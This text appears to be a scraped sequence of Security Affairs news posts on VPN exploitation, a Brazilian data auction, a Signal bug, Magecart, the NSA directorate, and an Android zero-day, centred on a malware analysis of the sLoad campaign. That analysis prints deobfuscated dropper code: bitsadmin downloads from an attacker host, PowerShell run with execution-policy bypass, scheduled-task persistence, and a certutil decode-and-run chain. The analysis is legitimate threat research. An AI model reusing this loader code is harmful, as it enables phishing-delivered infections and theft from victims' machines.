Teheran: U.S. has started ‘Cyber War against Iran

Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS

Asics apologizes after pornography ran on screens at central store in Auckland for hours

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Experts found 20 Million tax records for Russian citizens exposed online

Former American Express employee under investigation for customers data abuse

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

Zendesk 2016 security breach may impact Uber, Slack, and other organizations

6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group

Dutch police shut down bulletproof service hosting tens of DDoS botnets

FBI warns about high-impact Ransomware attacks on U.S. Organizations

Ukrainian police dismantled a bot farm involved in multiple spam campaigns

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

Egypt regularly spies on opponents and activists with mobile apps

Project Zero researcher found unpatched Android zero-day likely exploited by NSO group

The sLoad Threat: Ten Months Later

Magecart hackers are expanding their operations

NSA Launches New Cybersecurity Directorate

 

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 234 appeared first on Security Affairs.

UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities

The UK’s National Cyber Security Centre (NCSC) warns of attacks exploiting recently disclosed VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure

According to the UK’s National Cyber Security Centre (NCSC), advanced persistent threat (APT) groups have been exploiting recently disclosed VPN vulnerabilities in enterprise VPN products in attacks in the wild. Threat actors leverage VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure, to breach into the target networks.

This week the NCSC issued an alert to warn organizations using the vulnerable products.

“The NCSC is investigating the exploitation, by Advanced Persistent Threat (APT) actors, of known vulnerabilities affecting Virtual Private Network (VPN) products from vendors Pulse securePalo Alto and Fortinet.” reads the alert issued by the NCSC.

“This activity is ongoing, targeting both UK and international organisations. Affected sectors include government, military, academic, business and healthcare,”

The UK agency reported that APT groups target several vulnerabilities, including CVE-2019-11510 and CVE-2019-11539 in Pulse Secure VPN solutions, and CVE-2018-13379,

The CVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal that could be exploited by an unauthenticated attacker to download FortiOS system files. The CVE-2018-13379 flaw could be exploited to obtain administrator credentials in plain text.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

APT groups also exploit CVE-2018-13382, CVE-2018-13383, and CVE-2019-1579, in Palo Alto Networks products.

The vulnerabilities were first reported in July by researchers Orange Tsai and Meh Chang from DEVCORE that found several flaws in Fortinet, Palo Alto Networks and Pulse Secure products. The issues could be exploited by threat actors to access corporate networks and steal sensitive documents.

“Users of these VPN products should investigate their logs for evidence of compromise, especially if it is possible that patches were not applied immediately after their release.” concludes the NCSC.

“Apart from specific product advice below, administrators should also look for evidence of compromised accounts in active use, such as anomalous IP locations or times.

Snort rules are available in open source, but may not pick up events for exploits over HTTPS.”

Pierluigi Paganini

(SecurityAffairs – vBulletin, data breach)

The post UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities appeared first on Security Affairs.

Hacker is auctioning a database containing details of 92 million Brazilians

A database containing details of 92 million Brazilians was auctioned by a threat actor on underground forums along with a search service focused on Brazilians.

Someone is auctioning on several restricted underground forums a database containing personal information of 92 million Brazilian citizens. The threat actor, registered as X4Crow, is also advertising a search service that allows retrieving detailed information on Brazilian citizens.

Brazilians
Source: Bleeping Computer

The records are arranged per province, they include names, dates of birth, and taxpayer ID (CPF – Cadastro de Pessoas Físicas), taxpayer details about legal entities, or the CNPJ (Cadastro Nacional da Pessoa Jurídica).

The initial price to participate in the auction is $15,000, participants can raise the price of 110 each time.

“A post on one of the forums seen by BleepingComputer informs that the database is 16GB large, in SQL format. The starting price for the auction is $15,000 with a step up bid of $1,000.” reported Bleeping computer.

According to BleepingComputer researchers that received a sample of the database, the data are authentic.

At the time of writing, it seems that the seller has not received any bid.

X4Crow also advertises a search service that allows retrieving detailed information on Brazilians (i.e. Email address, profession, education level, possible relatives, neighbors, license plates, vehicle, ID card, driver’s license) simply providing a full name, taxpayer ID, or phone number.

“There is no guarantee that all the details will be retrieved for all individuals but the report may provide, on average, 80% of the specifics listed above.” continues BleepingComputer.

Querying the service to retrieve data on a specific company and its corporate structure could cost up to $150.

According to BleepingComputer, X4Crow is a reliable actor in cybercrime underground even if it isn’t operating for a long time.

Pierluigi Paganini

(SecurityAffairs – Brazilians, cybercrime)

The post Hacker is auctioning a database containing details of 92 million Brazilians appeared first on Security Affairs.

A bug in Signal for Android could be exploited to spy on users

Researcher discovered a logical flaw in the Signal messaging app for Android that could be exploited by a malicious caller to force a call to be answered at the receiver’s end without interaction.

Google Project Zero white-hat hacker Natalie Silvanovich discovered a logical vulnerability in the Signal messaging app for Android that could be exploited by a malicious caller to force a call to be answered at the receiver’s end without requiring his interaction.

This means that the attacker could spy on the receiver through the microphone of his device.

However, the Signal vulnerability can only be exploited if the receiver fails to answer an audio call over Signal, eventually forcing the incoming call to be automatically answered on the receiver’s device.

The logical vulnerability resides in a method handleCallConnected that could be abused cause the call to be answered, even though the user the interaction.

“In the Android client, there is a method handleCallConnected that causes the call to finish connecting. During normal use, it is called in two situations: when the device accepts the call when the user selects ‘accept,’ and when the device receives an incoming “connect” message indicating that the has accepted the call,” reads the analysis published by Silvanovich. “Using a modified client, it is possible to send the “connect” message to a callee device when an incoming call is in progress but has not yet been accepted by the user. This causes the call to be answered, even though the user has not interacted with the device.”

Silvanovich explained that the iOS client is affected by a similar logical issue, but the call is not established due to an error in the UI caused by the unexpected sequence of states.

Silvanovich shared her findings with the Signal security team last week that quickly addressed it on the same day with the release of the version v4.47.7.

Pierluigi Paganini

(SecurityAffairs – Signal, hacking)

The post A bug in Signal for Android could be exploited to spy on users appeared first on Security Affairs.

Magecart hackers are expanding their operations

Cybercrime gangs under the Magecart umbrella continue to compromise e-commerce platforms to steal payment card data from users worldwide.

Hacker groups under the Magecart umbrella continue to target organizations payment card data with so-called software skimmers. Security firms have monitored the activities of a dozen groups at least since 2010

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of the groups is long and includes several major platforms such as British AirwaysNeweggTicketmasterMyPillow and Amerisleep, and Feedify

Millions of Magecart instances were detected over time, security experts discovered tens of software skimming scripts.

In a report recently published by RiskIQ, experts estimate that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them are supply-chain attacks.

“Suppliers can include vendors that integrate with sites to add or improve site functionality or cloud resources from which websites pull code, such as Amazon S3 Buckets. These third-parties integrate with thousands of websites” states the report.

Magecart group tracked as MG5 (Group 5) appears to be the most sophisticated and prolific group. MG5 focuses on supply chain attacks, it is responsible for the hack of hundreds of websites and providers such as SociaPlus and Inbenta.

In June, the gang made the headlines again, after infecting over 17,000 domains by targeting improperly secured Amazon S3 buckets

Recently, IBM researchers observed one of the MG5 group 5 using malicious code to inject into commercial-grade layer 7 L7 routers.

According to RiskIQ, many groups under the umbrella still focus on e-commerce sites powered with the Magento shopping or OpenCart platform.

Magecart

Following a consolidated pattern of attack that is common in the hacking community, Magecart attempt to exploit vulnerabilities that the victims have yet to patch even is security updates have been released by Magento and other software vendors.

Attackers also look for new attack vectors to distribute their software skimming, such as compromising creative ad script tags to leverage digital ad networks to generate traffic to their skimmers and hit thousands of sites at once.

RiskIQ report revealed that of all malicious advertisements it has analyzed, the 17% is associated with the Magecart groups.

Below other interesting insights included in the report:

  • 17% of all Malvertisements detected by RiskIQ contain Magecart skimmers
  • The average length of a Magecart breach is 22 days with many lasting years, or even indefinitely.
  • Shopping platforms such as Magento and OpenCart are the lifeblood of many Magecart groups. RiskIQ has detected 9,688 vulnerable Magento hosts.
  • Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains. 
  • Because Magecart skimmers stay on websites for so long, threat actors are purchasing Magecart infrastructure that’s gone offline to assume access to these breached sites. 

The full report, containing additional insights and information, is available for download here: https://www.riskiq.com/research/magecart-growing-threat/

Pierluigi Paganini

(SecurityAffairs – software skimmers, hacking)

The post Magecart hackers are expanding their operations appeared first on Security Affairs.

NSA Launches New Cybersecurity Directorate

NSA is redefining its cybersecurity mission and with the Cybersecurity Directorate it will enhance its partnerships with unclassified collaboration and information sharing.

Under the new Cybersecurity Directorate — a major organization that unifies NSA’s foreign intelligence and cyberdefense missions

The NSA announced the new Cybersecurity Directorate — which will help defend domestic organizations from foreign cyberattacks.

The NSA announced the new Cybersecurity Directorate — which will help defend domestic organizations from foreign cyberattacks — in a short press release. The NSA, sometimes called by its nickname, “No Such Agency,” is known for being secretive. But this new directorate seems to signal a pivot towards a more public approach to security than the Agency has taken in the past.

nsa

The directorate also reflects a change in the importance of national cybersecurity and provides a hint as to how government agencies are rethinking how cybersecurity divisions should be organized.

The NSA Makes Cyberdefense a Top Priority

The directorate will unify the NSA’s current foreign intelligence and cyberdefense operations, bringing them together in a “major organization” designed to defend domestic organizations against foreign cyberattacks. The NSA expects the directorate to “reinvigorate NSA’s white hat mission” by seeing the Agency turn towards providing partners and “customers” with threat information, and by otherwise equipping them against cyberattacks.

The directorate will have NSA turn its efforts towards securing military and defense industry security. A short, NSA-produced video at the end of the press release provided more information about what threats the NSA expects to defend the public from — including attacks on infrastructure, theft of classified information, and “mass deception of the public.”

The pivot comes at a time where the nation is facing several security crises and reasonable fears that almost anything that runs on a computer — banks, voting machines, and critical infrastructure — can be compromised or damaged by cyberattacks.

The launch of the new directorate — and the focus of the press release on cyberdefense — follows comments made by Glenn Gerstell, chief counsel of the NSA, back in September. At that time, Gerstell said that the NSA wouldn’t “hack back” in the case of a cyberattack and that the Agency was instead focused on defending key information and infrastructure from theft or damage by foreign actors.

The directorate is not the Agency’s first foray into providing private domestic organizations with intel about foreign hackers. In 2011, as the financial sector was still recovering from the financial crisis of 2008, the Agency began providing Wall Street banks with cybersecurity information in the hopes that it would prevent “financial sabotage.”

The State of Cybersecurity

The directorate reflects a broader change that’s also being seen in the private sector. Cybersecurity is no longer seen as a sub-component of an overall security plan, or as part of the tech department, but as a necessary investment that requires top talent and serious commitment of resources. Networks are more likely to be considered vulnerable and need better defense from cyberattacks.

Businesses are increasingly relying on Internet of Things or “smart” devices to provide data. But these devices are often improperly secured and allow an access point to secure networks, and the valuable information held there. As the world becomes more connected, there are more opportunities for hackers to slip in between the cracks of cyberdefenses and do damage once they have access to secure networks.

In the press release, the NSA said that the Agency will “invest in and rely on its expert workforce.” It’s not clear right now if the new directorate will result in the NSA expanding its cybersecurity workforce. If so, they may run into some of the problems faced by the private sector, in that the number of cybersecurity experts has not kept pace with the frequency of, intensity of, and damage done by cyberattacks.

What the NSA’s Directorate Means for Cybersecurity

The new director shows that cybersecurity is a higher priority than ever for the Agency, and signals a turn to more public involvement in national security. Time will tell how effective the directorate is at preventing or reducing the harm of cyberattacks, but the defense industry is likely happy to receive any help that they can.

Going forward, cybersecurity will continue to become more important as critical infrastructure and essential components of our economy and national defense become more connected. Whether or not the cybersecurity industry will be able to keep up with the rising pace of attacks remains to be seen.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, NSA Cybersecurity Directorate)

The post NSA Launches New Cybersecurity Directorate appeared first on Security Affairs.

The sLoad Threat: Ten Months Later

Since September 2018, SLoad (tracked as TH-163) is the protagonist of an increasing and persistent wave of attacks against Italian organizations.

Introduction

SLoad (TH-163) is the protagonist of increasing and persistent attack waves against the Italian panorama since Q3 2018 and then in 2019 (e.g N020419N040619N010819), but also against the UK and Canada as reported by Proofpoint. Ten months ago, we wrote about the complex infection chain the sLoad malware threat was using during its attack campaigns, and today we are looking at the evolution of the threat by dissecting one of its latest attacks.

During our CSDC monitoring operation, we recently noticed some changes in the infamous attack waves related to sLoad, which is known for adopting a complex infection chain using to spread additional malware. For this reason Cybaze-Yoroi ZLAB dissected one latest ones.

Technical Analysis

According to CERT-PA investigations, the malware has recently been delivered using legit certified emails (PEC). These recent attack waves were targeting Italians Organizations and consultants affiliated to Professional associations, such as lawyers and civil engineers. Once again the attachment is a malicious zip. 

Figure 1: Example of mail (source:CERT-PA)

The Infection Chain

Figure 2: Files contained in attachment file zip

This time the zip does not hide powershell code, such the appended one recovered in the past waves. The archive contains two files: a corrupted PDF file and a VBScript. The first one is designed to deceive the unaware user and force him to open the runnable script.

In the following tables are shown some basic information about samples contained in the zip archive.

Hash30d6f6470e145a1d1f2083abc443148c8e3f762025ca262267ae2e531b2e8ab4
Threat.vbs dropper
Brief DescriptionSload visual basic script loader
Ssdeep192:Fb1TpsF8Z1mZcwfD0VCmA7VETYM/2IVKfCH:FbQjZZfDsA7G2zfCH

Table 1: Information about SLoad .vbs dropper

Hash43db5fcb75d50a5516b687b076be5eb1aaec4b51d8d61a60efc69b383c1d757c
Threat.pdf file
Brief DescriptionSload corrupted pdf file
Ssdeep1536:mmD8g29U+A092Ljr/N0VyvD/ABVqYA7hq4XoZxXjdY4u/dQV:FdLKQjrFgyvsB0YA1q4YZxpWQV

Table 2: Information about SLoad .pdf file

Opening the vbs dropper is possible to see an obfuscated script containing several junk instructions like unused variables and commented codes. After a deobfuscation phase is possible to see the inner logic. The purpose of this script is launch start a powershell script retrieved from the attacker infrastructures and, in the meantime, decoy the victim.

  1. On Error Resume Next
  2. Set ZCzG = CreateObject(“Scripting.FileSystemObject”)
  3. Set PavfQt = WScript.CreateObject (“WScript.Shell”)
  4. Set XaiX = ZCzG.GetFolder(“c:\Users\”)
  5. Recurse(XaiX)
  6. PavfQt.run “bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://dreamacinc.com/UCP9dATGyt6mJ/srdzHcN4bWUum.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1”,0,True
  7. i=0
  8. Do While i < 1
  9. If (ZCzG.FileExists(“c:\Users\Public\Downloads\RSbYHuPO.ps1”)) Then
  10. i=1
  11. End If
  12. WScript.Sleep(2280)
  13. Loop
  14. PavfQt.run “powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 “,0,True
  15. Sub Recurse(JFLY)
  16. If IsAccessible(JFLY) Then
  17. For Each oSubFolder In JFLY.SubFolders
  18. Recurse oSubFolder
  19. Next
  20. For Each RIst In JFLY.Files
  21. If InStr(RIst.Name,”.pdf”) > 0 Then
  22. PavfQt.run “explorer “+JFLY+”\”+RIst.Name
  23. End if
  24. Next
  25. End If
  26. End Sub
  27. Function IsAccessible(XaiX)
  28. On Error Resume Next
  29. IsAccessible = (XaiX.SubFolders.Count >= 0)
  30. End Function

Code snippet 1: Deobfuscated vbs dropper

The malware downloads a fake jpg using the using “bitsadmin.exe”  tool from “hxxps://dreamacinc[.com/UCP9dATGyt6mJ/srdzHcN4bWUum[.jpg”. The usage of native tools allow the script to operate under the radar avoiding several AVs controls. The fake jpg actually contains a powershell script. 

  1. $oLZz2= “C:\Users\admin\AppData\Roaming”;
  2. $YwbpkcN9XUIv1w=@(1..16);
  3. […]
  4. $main_ini=’76492d1116743f0423413b16050a5345MgB8ADUAVAB4 […] AMQAyAGYA’;
  5. $main_ini | out-file $PaIQGLoo’\main.ini’;
  6. $domain_ini=’76492d1116743f0423413b1605 […] YwBlAA==’;
  7. $domain_ini | out-file $PaIQGLoo’\domain.ini’;
  8. […]
  9. try{ […]
  10. }catch{$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  11. if ($yC0iBerAupzdtf5Z.length -lt 2){
  12. $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
  13. $r=8;
  14. $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  15. $zjGQzSypyGPthusR = $047MydhkAAfp1W+”\”+$B3xcDMBF;
  16. $sv8eJJhgWV3xAN7Uu=@(1..16);
  17. $umwTVcIoudRlXjR6yAQQ= Get-Content “main.ini”$MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  18. $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  19. $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  20. Invoke-Expression $DBR4S3t;
  21. }
  22. } | out-file $PaIQGLoo’\’$H3z9RnzIihO8′.ps1′
  23. $OFHc0H4A=’ /F /create /sc minute /mo 3 /TN “S’+$rs+$fLCg9ngJqRHX36hfUr+'” /ST 07:00 /TR “wscript /E:vbscript ‘+$PaIQGLoo+’\’+$JxdRWnHC+’.tmp”‘;
  24. start-process -windowstyle hidden schtasks $OFHc0H4A; […]

Code snippet 2: Downloaded powershell code

The first action the script  does is to set a scheduled task to grant persistence on the infected machine. Then, after selection a random active process on infected machine (“System” in this specific infection) and concatenation it with the “%AppData%\Roaming” path, it stores four different files in his installation folder.

  • <random_name>.tmp
  • <random_name>.ps1
  • domain.ini
  • main.ini

All of them are embedded in the script; furthermore, two of them (“domain.ini” and “main.ini”)  are encrypted using the “ConvertFrom-SecureString”  native function. Then, the script runs the “UoqOTQrc.tmp” file, having the only purpose to execute the “UoqOTQrc.ps1” file contained in the same folder.

Figure 3: Files created in “%AppData%\Roaming\<active_process>\”
  1. Dim str, min, max
  2. Const LETTERS = “abcdefghijklmnopqrstuvwxyz”
  3. min = 1
  4. max = Len(LETTERS)
  5. Randomize
  6. […]
  7. Set objFSO=CreateObject(“Scripting.FileSystemObject”)
  8. Set winssh = WScript.CreateObject (“WScript.Shell”)
  9. fName=RandomString(10)
  10. JAcalshy=RandomString(4)
  11. fZgxNPDMnu=RandomString(4)
  12. WEHxctVdTEoDfqEqJMP=RandomString(4)
  13. […]
  14. Set objFile = objFSO.CreateTextFile(outFile,8, True)
  15. objFile.Write “Set “+JAcalshy+”=rshe” & vbCrLf
  16. objFile.Write “Set “+fZgxNPDMnu+”=ypa” & vbCrLf
  17. objFile.Write “Set “+WEHxctVdTEoDfqEqJMP+”=il” & vbCrLf
  18. objFile.Close
  19. winssh.run “powershell -ep bypass -file .ps1”,0,true

Code snippet 3: content of “UoqOTQrc.tmp” file.

  1. try{
  2. Remove-EventLog:Debug-Job
  3. Export-BinaryMiLog:Get-PSSessionConfiguration
  4. Remove-JobTrigger:New-Item
  5. }catch{
  6. $yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  7. if ($yC0iBerAupzdtf5Z.length -lt 2){
  8. $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$r=8;
  9. $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  10. $zjGQzSypyGPthusR = $047MydhkAAfp1W+”\”+$B3xcDMBF;
  11. $sv8eJJhgWV3xAN7Uu=@(1..16);
  12. $umwTVcIoudRlXjR6yAQQ= Get-Content “main.ini”
  13. $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  14. $AKXy3OFCowsfie =
  15. [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  16. $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  17. Invoke-Expression $DBR4S3t;
  18. }

Code snippet 4: content of “UoqOTQrc.ps1” file.

In the same way, the “UoqOTQrc” script decrypts the “mini.ini” file using the “ConvertFrom-SecureString” function and the ecnryption key contained in “$sv8eJJhgWV3xAN7Uu” variable, a sequential integer array. 

Figure 4: “main.ini” file before and after decryption

The decrypted “main.ini” script tries to ping a URL generated selecting three ascii char-codes in ranges [65-90] and [67-122]. Then, it decrypts “domain.ini” using the key in the “$main_key” variable. In the end, it saves the results in the “btc.log” file. Continuing the analysis of “main.ini” is possible to spot that the script also grabs system information to check-in the newly infected host.

Figure 5: “domain.ini” file before and after decryption
Figure 6: Some information exfiltrate by the malware before and after base64 decoding

At this point, another malicious file is downloaded. The malware retrieves it from “hxxps://<C2_URL>/doc/x2401.jpg”. Once again, this is not a real jpg, but rather another obfuscated powershell layer.

  1. $u2K2MQ4 = “`r`n”
  2. $lNlNrKyk= –join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
  3. $yIXgWSaXsKD5hanf9uO= $env:userprofile+’\App’+’Da’+’ta\Ro’+’am’+’ing’;
  4. $hh=’hi’+’dd’+’en’;
  5. $ixXApGeqJKEGY=@(1..16);
  6. $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  7. $Erlydj = $Erlydjiyy.UUID;
  8. $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  9. $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+”\”+$sOmUGoc0ysV8UW;
  10. If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
  11. If(test-path $Z5lTNXB”\_in”){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB”\_in”;$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; “1” | out-file $Z5lTNXB”\_in”;
  12. try{ Remove-Item $Z5lTNXB’\*’}catch{}
  13. $wsxDITPgQCH+=’76492d1116743f0423413b16050a5345MgB8AGsAKwBwAHkASQBUAGgAWgBKAEsAbgBFAE8AUQBHA’;
  14. […]
  15. $wsxDITPgQCH+=’UAZAA1AGIAZAA0ADIAYgBkAGUANQAzADIAYgBkAGIAMwBlADMAZQA1ADAAOQA3ADgAYwAyAGYAMgA’;
  16. $wsxDITPgQCH+=’3ADAANQA1AA==’;
  17. $wsxDITPgQCH | out-file $Z5lTNXB’\config.ini’;
  18. $5r8DcJB4ok4+=’76492d1116743f0423413b16050a5345MgB8AHQAYgBqAFYAVQBQADUAQwBNAGEAZABWAFMA’;
  19. […]
  20. $5r8DcJB4ok4+=’YQBiADUAOAAzAGQANAAxADgAMwAxAGYANQAwAGIA’;
  21. $5r8DcJB4ok4 | out-file $Z5lTNXB’\web.ini’;
  22. start-process -windowstyle $hh schtasks ‘/change /tn GoFast /disable’;
  23. $2aWxu9dutZfOPCCgS+=$u2K2MQ4+’Dim ‘;
  24. […]
  25. $nz0oninX6=$ixXApGeqJKEGY -join ‘,’;
  26. $E6M6Np8nhXnu4ndPEJ=’ /F /create /sc minute /mo 3 /TN “U’+$sOmUGoc0ysV8UW+'” /ST 07:00 /TR “wscript /E:vbscript ‘+$Z5lTNXB+’\’+$lNlNrKyk+’.tmp”‘;
  27. start-process -windowstyle $hh schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 5: Obfuscated content of “x2401.jpg” file.

  1. $u2K2MQ4 = “rn”;
  2. $lNlNrKyk= –join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_});
  3. $yIXgWSaXsKD5hanf9uO= $env:userprofile+’\AppData\Roaming’;
  4. $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  5. $Erlydj = $Erlydjiyy.UUID;
  6. $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  7. $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+”\”+$sOmUGoc0ysV8UW;
  8. If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
  9. If(test-path $Z5lTNXB”\_in”){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB”\_in”;$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; “1” | out-file $Z5lTNXB”\_in”;
  10. try{ Remove-Item $Z5lTNXB’\*’}catch{}
  11. $wsxDITPgQCH=”76492d1 […] A1AA==”;
  12. $wsxDITPgQCH | out-file $Z5lTNXB’\config.ini’;
  13. $5r8DcJB4ok4=”7649 […] AGIA”;
  14. $5r8DcJB4ok4 | out-file $Z5lTNXB’\web.ini’;
  15. start-process -windowstyle hidden schtasks ‘/change /tn GoFast /disable’;
  16. $2aWxu9dutZfOPCCgS=”Dim winssh […] winssh.run “powershell -ep bypass -file vJjFwtSM.ps1″,0,true”;
  17. $2aWxu9dutZfOPCCgS | out-file $Z5lTNXB’\’$lNlNrKyk’.tmp’
  18. $r1uIiPZBhUea0=” $zTxePJtpmbVI0btT6cd9=Get-Process -name powershell*; […] Invoke-Expression $NLO3lwvn1xWn;}”;
  19. $r1uIiPZBhUea0 | out-file $Z5lTNXB’\’$lNlNrKyk’.ps1′
  20. $nz0oninX6=”1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16″;
  21. $E6M6Np8nhXnu4ndPEJ=”/F /create /sc minute /mo 3 /TN “U52A34D” /ST 07:00 /TR “wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp”;
  22. start-process -windowstyle hidden schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 6: Deobfuscated content of “x2401.jpg” file.

Like previous script, this one perform the same operations and create other four file in “%AppData%\Roaming\<active_process>” path. This time the files are:

Figure 7: Files created in “%AppData%\Roaming\<active_process>\”
  • <random_name>.tmp
  • <random_name>.ps1
  • config.ini
  • web.ini

The first executed file is “<random_name>.tmp”. It is not obfuscated and its only purpose is the execution of “<random_name>.ps1”. The content of “<random_name>.ps1” file is the following. The latest script decrypt the content of “config.ini” file. The following figure shown both encrypted and decrypted “config.ini” file.

Figure 8: Files created in “%AppData%\Roaming\<active_process>\”

This script performs the same operation described in “main.ini” file but use different URLs stored in the “web.ini” file. Also this time, the file is decrypted using an integer array from 1 to 16  as key and contained in “$mainKey” variable.

Figure 9: “web.ini” file before and after decryption

Finally, it tries to download the final payload with the following piece of script. However, at the time of analysis, all the C2 URLs seems to be down, so we are not able to detect the final payload family. 

  1. $dPath = [Environment]::GetFolderPath(“MyDocuments”)
  2. $jerry=$starsLord+’\’+$roccon+’_’+$rp;
  3. $clpsr=’/C bitsadmin /transfer ‘+$rp+’ /download /priority FOREGROUND ‘+$line+’ ‘+$jerry+’.txt & Copy /Z ‘+$jerry+’.txt ‘+$jerry+’_1.txt & certutil -decode ‘+$jerry+’_1.txt ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe & powershell -command “start-process ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe” & exit’;
  4. start-process -wiNdowStylE HiddeN $mainDMC $clpsr;
  5. $clpsr=’/C del ‘+$jerry+’.txt & del ‘+$jerry+’_1.txt & del ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe & exit’;
  6. start-process -wiNdowStylE HiddeN $mainDMC $clpsr;

Code snippet 7: script to download the final payload

Comparison With Previous Chains

To better understand the evolution of sLoad infection chain, we compared attack attempts observed since 2018 and the latest ones. In both cases, the infection vector is a carefully themed malicious email, weaponized with zip archive containing two files. In the first case the starting point is a “.lnk” file and in the second one the chain starts with a “.vbs” script. 

The sLoad attack chain observed months ago was characterized by some pieces of powershell code appended to the tail of the zip archive. Probably, this technique become more detectable during the time, so it could have been deprecated in latest infections attempts. For both malware variants, the archive contains a legit image (or pdf) used to deceive the unaware user. Moreover, in the first analyzed variant, the core of the infection is mainly based on powershell scripts and LOLbins. However, the latest stages uses a mix of Powershell and Visual Basic Scripts.


Figure 10: Infection chain workflow

The agent body is still quite similar in the core structure, however the bot now supports new commands such as “Exec” and “Eval”, the latter is able to download further code through the Bitsadmin utility instead of directly rely on “Net.WebClient” primitive. Also, the “ScreenCapture” function have been removed from the new version of the code, in favor to the enhancement of the agent persistence through scheduled task.

Figure 11: Comparison between old and new version on “config.ini” file

Conclusion

sLoad is keeping evolving their TTPs and represents a vivid threat for the Italian cyber-panorama. Also, many times, especially during the last months, its activities in the country involved the abuse of certified mailboxes (PEC) targeting associated professionals and consultants, along with private companies. Additionally, the quality of the latest phishing emails is high: the group adopted templates and naming conventions actually in use by  Italian Revenue Agency (“Agenzia delle Entrate”).

The plentiful usage of LOLbins, Powershell scripts and SSL encrypted channels, makes detection of this threat difficult for automated systems, and frequently requires analysis abilities or high quality threat intelligence sources to detect and tackle sLoad attack campaigns, many times targeting just a single country.

Experts published a post on the Yoroi blog:

https://blog.yoroi.company/research/the-sload-threat-ten-months-later/

Pierluigi Paganini

(SecurityAffairs – sLoad, malware)

The post The sLoad Threat: Ten Months Later appeared first on Security Affairs.

Project Zero researcher found unpatched Android zero-day likely exploited by NSO group

Google Project Zero researcher Maddie Stone discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system.

Maddie Stone, a member of the Google elite team Project Zero, discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system. According to the expert, the bug, tracked as CVE-2019-2215, was allegedly being used or sold by the controversial surveillance firm NSO Group.

Maddie Stone published technical details and a proof-of-concept exploit for the high-severity security vulnerability, seven days after she reported it to the colleagues of the Android security team.

The flaw is a use-after-free vulnerability that affects the Android kernel’s binder driver, it could be exploited by a local privileged attacker or a malicious app to escalate privileges to gain root access to a vulnerable device. Experts warn it could potentially allow to fully compromise the device.

“There is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c.” reads the security advisory.

“As described in the upstream commit: “binder_poll() passes the thread->wait waitqueue that can be slept on for work. When a thread that uses
epoll explicitly exits using BINDER_THREAD_EXIT, the waitqueue is freed, but it is never removed from the corresponding epoll data structure. When
the process subsequently exits, the epoll cleanup code tries to access the waitlist, which results in a use-after-free.”

